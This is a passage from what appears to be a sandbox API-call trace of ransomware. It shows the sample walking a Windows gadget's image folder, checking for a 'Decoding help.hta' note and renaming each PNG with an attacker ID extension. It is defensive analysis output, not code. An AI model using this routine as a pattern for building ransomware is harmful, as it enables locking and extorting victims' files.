Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.081] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\1.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\1.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.082] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba11b582, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba11b582, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc084a69c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.png", cAlternateFileName="")) returned 1 [0059.082] lstrcpyW (in: lpString1=0x2a868710, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.082] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0059.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0059.082] lstrcmpiW (lpString1="Decoding help.hta", lpString2="10.png") returned 1 [0059.082] lstrlenW (lpString="10.png") returned 6 [0059.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.082] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="10.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" [0059.082] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" [0059.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.082] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\10.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\10.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.426] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1416e1, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1416e1, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc084a69c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x6936, dwReserved0=0x0, dwReserved1=0x0, cFileName="11.png", cAlternateFileName="")) returned 1 [0059.426] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.426] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.426] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0059.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0059.427] lstrcmpiW (lpString1="Decoding help.hta", lpString2="11.png") returned 1 [0059.427] lstrlenW (lpString="11.png") returned 6 [0059.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.427] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.427] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="11.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" [0059.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" [0059.427] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.427] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\11.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\11.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.427] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba05cea7, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba05cea7, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc08707fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x7210, dwReserved0=0x0, dwReserved1=0x0, cFileName="2.png", cAlternateFileName="")) returned 1 [0059.427] lstrcpyW (in: lpString1=0x2ab190a0, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.427] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.427] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0059.427] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0059.427] lstrcmpiW (lpString1="Decoding help.hta", lpString2="2.png") returned 1 [0059.427] lstrlenW (lpString="2.png") returned 5 [0059.427] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0059.428] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0059.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" [0059.428] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" [0059.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" [0059.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\2.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\2.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.389] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba083006, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba083006, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc08707fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x5f4d, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.png", cAlternateFileName="")) returned 1 [0060.389] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0060.389] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0060.389] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0060.389] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0060.389] lstrcmpiW (lpString1="Decoding help.hta", lpString2="3.png") returned 1 [0060.389] lstrlenW (lpString="3.png") returned 5 [0060.389] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0060.389] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0060.389] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" [0060.389] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" [0060.389] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.389] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\3.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\3.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.389] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba083006, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba083006, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc08707fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3dec, dwReserved0=0x0, dwReserved1=0x0, cFileName="4.png", cAlternateFileName="")) returned 1 [0060.389] lstrcpyW (in: lpString1=0x115c1600, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0060.390] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0060.390] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0060.390] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0060.390] lstrcmpiW (lpString1="Decoding help.hta", lpString2="4.png") returned 1 [0060.390] lstrlenW (lpString="4.png") returned 5 [0060.390] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0060.390] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0060.390] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="4.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" [0060.390] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" [0060.390] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" [0060.390] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\4.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\4.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0061.310] FindNextFileW (in: hFindFile=0x5a6030, lpFindFileData=0x2c06fd30 | out: lpFindFileData=0x2c06fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba0a9165, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba0a9165, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc089695c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x61bd, dwReserved0=0x0, dwReserved1=0x0, cFileName="5.png", cAlternateFileName="")) returned 1 [0061.310] lstrcpyW (in: lpString1=0x10958800, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0061.310] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" [0061.310] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\decoding help.hta")) returned 0x1 [0061.310] lstrcmpiW (lpString1="Decoding help.hta", lpString2="5.png") returned 1 [0061.310] lstrlenW (lpString="5.png") returned 5 [0061.310] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0061.310] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned 82 [0061.310] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\", lpString2="5.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" [0061.310] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" [0061.310] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png.[ID]g9uZrLhJaygpwRm1[ID]" [0061.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\5.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\5.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows 